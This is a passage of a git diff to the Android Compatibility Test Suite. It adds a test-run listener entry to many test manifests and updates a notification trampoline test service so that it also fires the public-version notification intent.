+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/codec/AndroidManifest.xml b/tests/tests/media/codec/AndroidManifest.xml
index 9b6d960..383a03a 100644
--- a/tests/tests/media/codec/AndroidManifest.xml
+++ b/tests/tests/media/codec/AndroidManifest.xml
@@ -55,6 +55,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.codec.cts"
          android:label="CTS tests of android.media">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/decoder/AndroidManifest.xml b/tests/tests/media/decoder/AndroidManifest.xml
index 6e627cd..d25d904 100644
--- a/tests/tests/media/decoder/AndroidManifest.xml
+++ b/tests/tests/media/decoder/AndroidManifest.xml
@@ -50,6 +50,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.decoder.cts"
          android:label="CTS tests of android.media">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/drmframework/AndroidManifest.xml b/tests/tests/media/drmframework/AndroidManifest.xml
index 64bd305..fd146bd 100644
--- a/tests/tests/media/drmframework/AndroidManifest.xml
+++ b/tests/tests/media/drmframework/AndroidManifest.xml
@@ -38,6 +38,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.drmframework.cts"
          android:label="CTS tests of android MediaDrm">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/encoder/AndroidManifest.xml b/tests/tests/media/encoder/AndroidManifest.xml
index cddc623..b6d56f3 100644
--- a/tests/tests/media/encoder/AndroidManifest.xml
+++ b/tests/tests/media/encoder/AndroidManifest.xml
@@ -38,6 +38,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.encoder.cts"
          android:label="CTS tests of android.media">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/extractor/AndroidManifest.xml b/tests/tests/media/extractor/AndroidManifest.xml
index 4f59705..82f45b9 100644
--- a/tests/tests/media/extractor/AndroidManifest.xml
+++ b/tests/tests/media/extractor/AndroidManifest.xml
@@ -33,6 +33,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.extractor.cts"
          android:label="CTS tests of android MediaExtractor">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/misc/AndroidManifest.xml b/tests/tests/media/misc/AndroidManifest.xml
index f831ab1..08db1d4 100644
--- a/tests/tests/media/misc/AndroidManifest.xml
+++ b/tests/tests/media/misc/AndroidManifest.xml
@@ -82,6 +82,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.misc.cts"
          android:label="CTS tests of android.media">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/muxer/AndroidManifest.xml b/tests/tests/media/muxer/AndroidManifest.xml
index 7232c2c..f914229 100644
--- a/tests/tests/media/muxer/AndroidManifest.xml
+++ b/tests/tests/media/muxer/AndroidManifest.xml
@@ -33,6 +33,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.muxer.cts"
          android:label="CTS tests of android MediaMuxer">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/player/AndroidManifest.xml b/tests/tests/media/player/AndroidManifest.xml
index 51c7f5f..a43fffc 100644
--- a/tests/tests/media/player/AndroidManifest.xml
+++ b/tests/tests/media/player/AndroidManifest.xml
@@ -59,6 +59,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.player.cts"
          android:label="CTS tests of android MediaPlayer">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/media/recorder/AndroidManifest.xml b/tests/tests/media/recorder/AndroidManifest.xml
index c102781..28ddf67 100644
--- a/tests/tests/media/recorder/AndroidManifest.xml
+++ b/tests/tests/media/recorder/AndroidManifest.xml
@@ -37,6 +37,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.recorder.cts"
          android:label="CTS tests of android MediaRecorder">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/mediaparser/AndroidManifest.xml b/tests/tests/mediaparser/AndroidManifest.xml
index a457dc3..f0f6d97 100644
--- a/tests/tests/mediaparser/AndroidManifest.xml
+++ b/tests/tests/mediaparser/AndroidManifest.xml
@@ -28,5 +28,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.media.mediaparser.cts"
             android:label="Tests for MediaParser.">
+        <meta-data android:name="listener"
+                android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/mediastress/AndroidManifest.xml b/tests/tests/mediastress/AndroidManifest.xml
index 1e6f1ba..9f717fc 100644
--- a/tests/tests/mediastress/AndroidManifest.xml
+++ b/tests/tests/mediastress/AndroidManifest.xml
@@ -49,6 +49,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.mediastress.cts"
          android:label="Media stress tests InstrumentationRunner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/mediatranscoding/AndroidManifest.xml b/tests/tests/mediatranscoding/AndroidManifest.xml
index 9c0b950..c69754a 100644
--- a/tests/tests/mediatranscoding/AndroidManifest.xml
+++ b/tests/tests/mediatranscoding/AndroidManifest.xml
@@ -34,5 +34,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.media.mediatranscoding.cts"
             android:label="Tests for MediaTranscoding.">
+        <meta-data android:name="listener"
+                android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/midi/AndroidManifest.xml b/tests/tests/midi/AndroidManifest.xml
index 036844d..186d1dd 100755
--- a/tests/tests/midi/AndroidManifest.xml
+++ b/tests/tests/midi/AndroidManifest.xml
@@ -41,5 +41,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="CTS MIDI tests"
          android:targetPackage="android.midi.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/mimemap/AndroidManifest.xml b/tests/tests/mimemap/AndroidManifest.xml
index bd2169f..ffb8a69 100644
--- a/tests/tests/mimemap/AndroidManifest.xml
+++ b/tests/tests/mimemap/AndroidManifest.xml
@@ -18,5 +18,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.content.type.cts"
                      android:label="CTS MimeMap test cases">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/nativehardware/AndroidManifest.xml b/tests/tests/nativehardware/AndroidManifest.xml
index 0fc8281..866e30a 100644
--- a/tests/tests/nativehardware/AndroidManifest.xml
+++ b/tests/tests/nativehardware/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.hardware.nativehardware.cts"
                      android:label="CTS native hardware tests">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/nativemidi/AndroidManifest.xml b/tests/tests/nativemidi/AndroidManifest.xml
index 609fa59..f89d012 100755
--- a/tests/tests/nativemidi/AndroidManifest.xml
+++ b/tests/tests/nativemidi/AndroidManifest.xml
@@ -46,5 +46,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="CTS Native MIDI tests"
          android:targetPackage="android.nativemidi.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/ndef/AndroidManifest.xml b/tests/tests/ndef/AndroidManifest.xml
index 0daae75..57320da 100644
--- a/tests/tests/ndef/AndroidManifest.xml
+++ b/tests/tests/ndef/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.ndef.cts"
                      android:label="CTS tests of NDEF data classes">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
index 6c04451..0d8c67a 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-false/AndroidManifest.xml
@@ -28,6 +28,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.netsecpolicy.usescleartext_false.cts"
                    android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is set to denied.">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
index 04a589d..1dc9e61 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-true/AndroidManifest.xml
@@ -28,6 +28,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.netsecpolicy.usescleartext_true.cts"
                    android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is set to permitted.">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml b/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
index 45ef96d..711ddb6 100644
--- a/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
+++ b/tests/tests/netsecpolicy/usescleartexttraffic-unspecified/AndroidManifest.xml
@@ -28,6 +28,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.netsecpolicy.usescleartext_unspecified.cts"
                    android:label="Tests for NetworkSecurityPolicy cleartext traffic policy when it is not specified.">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
index 7c58e78..ef8a381 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-attributes/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigAttributeTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
index cfbaffd..ac81332 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-basic-domain/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDomainConfigTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
index 9590352..f73c143 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/AndroidManifest.xml
@@ -29,5 +29,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigPrePCleartextTrafficTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
index 53a4e4b..b6dcfd7 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigCleartextTrafficTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
index 8636edf..b995fb2 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-disabled/AndroidManifest.xml
@@ -29,5 +29,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDebugDisabledTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
index 96c543d..c8a69f3 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-debug-basic-enabled/AndroidManifest.xml
@@ -29,5 +29,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigBasicDebugEnabledTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
index 05fd57a..715952a 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-downloadmanager/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigDownloadManagerTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
index 2043ee6..05b08b4 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-invalid-pin/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigInvalidPinTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
index 6096ed2..9de61b2 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-nested-domains/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigNestedDomainConfigTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml b/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
index 1b97069..699a1ad 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-resourcesrc/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.security.net.config.cts.CtsNetSecConfigResourcesSrcTestCases"
                    android:label="">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/nfc/AndroidManifest.xml b/tests/tests/nfc/AndroidManifest.xml
index b4404ae..ae7fa49 100644
--- a/tests/tests/nfc/AndroidManifest.xml
+++ b/tests/tests/nfc/AndroidManifest.xml
@@ -42,6 +42,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for Nfc CardEmulation API"
                      android:targetPackage="android.nfc.cts">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java b/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
index 120186b..81d10e1 100644
--- a/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
+++ b/tests/tests/notification/NotificationTrampolineBase/src/com/android/test/notificationtrampoline/NotificationTrampolineTestService.java
@@ -40,6 +40,7 @@
 
 import java.lang.ref.WeakReference;
 import java.util.Set;
+import java.util.concurrent.atomic.AtomicInteger;
 import java.util.stream.Stream;
 
 /**
@@ -133,20 +134,21 @@
                     break;
                 }
                 case MESSAGE_CLICK_NOTIFICATION: {
-                    PendingIntent intent = Stream
-                            .of(mNotificationManager.getActiveNotifications())
+                    AtomicInteger counter = new AtomicInteger();
+                    Stream.of(mNotificationManager.getActiveNotifications())
                             .filter(sb -> sb.getId() == notificationId)
-                            .map(sb -> sb.getNotification().contentIntent)
-                            .findFirst()
-                            .orElse(null);
-                    if (intent != null) {
-                        try {
-                            intent.send();
-                        } catch (PendingIntent.CanceledException e) {
-                            throw new IllegalStateException("Notification PI cancelled", e);
-                        }
-                    }
-                    sendMessageToTest(mCallback, TEST_MESSAGE_NOTIFICATION_CLICKED, intent != null);
+                            .flatMap(sb -> Stream.of(sb.getNotification().contentIntent,
+                                    sb.getNotification().publicVersion.contentIntent))
+                            .forEach(intent -> {
+                                try {
+                                    intent.send();
+                                } catch (PendingIntent.CanceledException e) {
+                                    throw new IllegalStateException("Notification PI cancelled", e);
+                                }
+                                counter.getAndIncrement();
+                            });
+                    sendMessageToTest(mCallback, TEST_MESSAGE_NOTIFICATION_CLICKED,
+                            counter.get() == 2);
                     break;
                 }
                 default:
@@ -164,10 +166,16 @@
     }
 
     private void postNotification(int notificationId, PendingIntent intent) {
+        Notification publicNotification =
+                new Notification.Builder(this, NOTIFICATION_CHANNEL_ID)
+                        .setSmallIcon(android.R.drawable.ic_info)
+                        .setContentIntent(intent)
+                        .build();
         Notification notification =
                 new Notification.Builder(this, NOTIFICATION_CHANNEL_ID)
                         .setSmallIcon(android.R.drawable.ic_info)
                         .setContentIntent(intent)
+                        .setPublicVersion(publicNotification)
                         .build();
         NotificationChannel notificationChannel = new NotificationChannel(NOTIFICATION_CHANNEL_ID,
                 NOTIFICATION_CHANNEL_ID, NotificationManager.IMPORTANCE_DEFAULT);
diff --git a/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
index ab456f4..25566a1 100644
--- a/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy20/AndroidManifest.xml
@@ -36,5 +36,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.notification.legacy20.cts"
                      android:label="CTS tests for notification behavior (API 20)">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
index 00e7c5f..a670716 100644
--- a/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy27/AndroidManifest.xml
@@ -63,5 +63,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.notification.legacy.cts"
                      android:label="CTS tests for notification behavior (API 27)">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
index 8b14f55..e369072 100644
--- a/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy28/AndroidManifest.xml
@@ -36,5 +36,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.notification.legacy28.cts"
                      android:label="CTS tests for notification behavior (API 28)">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
index 5a5eea5..dae1c34 100644
--- a/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy29/AndroidManifest.xml
@@ -48,5 +48,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.notification.legacy29.cts"
                      android:label="CTS tests for notification behavior (API 29)">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
\ No newline at end of file
diff --git a/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml b/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
index 7a1e70f..95fa88c 100644
--- a/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/notificationlegacy30/AndroidManifest.xml
@@ -29,5 +29,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.notification.legacy30.cts"
                      android:label="CTS tests for notification behavior (API 30)">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/opengl/AndroidManifest.xml b/tests/tests/opengl/AndroidManifest.xml
index e99d827..a7a09b7 100644
--- a/tests/tests/opengl/AndroidManifest.xml
+++ b/tests/tests/opengl/AndroidManifest.xml
@@ -23,6 +23,8 @@
     <uses-feature android:glEsVersion="0x00020000"/>
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.opengl.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
     <application android:icon="@drawable/ic_launcher"
diff --git a/tests/tests/openglperf/AndroidManifest.xml b/tests/tests/openglperf/AndroidManifest.xml
index f2b681a..8573455 100644
--- a/tests/tests/openglperf/AndroidManifest.xml
+++ b/tests/tests/openglperf/AndroidManifest.xml
@@ -29,9 +29,13 @@
     <!-- Two activities are used -->
     <instrumentation android:targetPackage="com.replica.replicaisland"
          android:name="androidx.test.runner.AndroidJUnitRunner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
     <instrumentation android:targetPackage="android.openglperf.cts"
          android:name="androidx.test.runner.AndroidJUnitRunner">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
     <application>
diff --git a/tests/tests/os/AndroidManifest.xml b/tests/tests/os/AndroidManifest.xml
index bcb9377..01c118a 100644
--- a/tests/tests/os/AndroidManifest.xml
+++ b/tests/tests/os/AndroidManifest.xml
@@ -222,6 +222,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.os.cts"
          android:label="CTS tests of android.os">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/os/UffdGc/AndroidManifest.xml b/tests/tests/os/UffdGc/AndroidManifest.xml
index 2438a51..8d7f12e 100644
--- a/tests/tests/os/UffdGc/AndroidManifest.xml
+++ b/tests/tests/os/UffdGc/AndroidManifest.xml
@@ -20,6 +20,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.os.cts.uffdgc"
                      android:label="CTS tests of userfaultfd-based GC">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/packagewatchdog/AndroidManifest.xml b/tests/tests/packagewatchdog/AndroidManifest.xml
index b985cbd..d4d49d06 100644
--- a/tests/tests/packagewatchdog/AndroidManifest.xml
+++ b/tests/tests/packagewatchdog/AndroidManifest.xml
@@ -28,6 +28,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.packagewatchdog.cts"
                      android:label="CTS tests of PackageWatchdog">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/permission/AndroidManifest.xml b/tests/tests/permission/AndroidManifest.xml
index 43fd97b..bd34215 100644
--- a/tests/tests/permission/AndroidManifest.xml
+++ b/tests/tests/permission/AndroidManifest.xml
@@ -95,6 +95,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.permission.cts"
          android:label="CTS tests of android.permission">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/permission/sdk28/AndroidManifest.xml b/tests/tests/permission/sdk28/AndroidManifest.xml
index 1714052..1dfeb2a 100644
--- a/tests/tests/permission/sdk28/AndroidManifest.xml
+++ b/tests/tests/permission/sdk28/AndroidManifest.xml
@@ -47,6 +47,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.permission.cts.sdk28"
          android:label="CTS tests of legacy android permissions as of API 28">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/permission/telephony/AndroidManifest.xml b/tests/tests/permission/telephony/AndroidManifest.xml
index 0349880..c2f0943 100644
--- a/tests/tests/permission/telephony/AndroidManifest.xml
+++ b/tests/tests/permission/telephony/AndroidManifest.xml
@@ -31,6 +31,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.permission.cts.telephony"
                      android:label="CTS tests of android.permission">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/permission3/AndroidManifest.xml b/tests/tests/permission3/AndroidManifest.xml
index 71d1318..0006b9f 100644
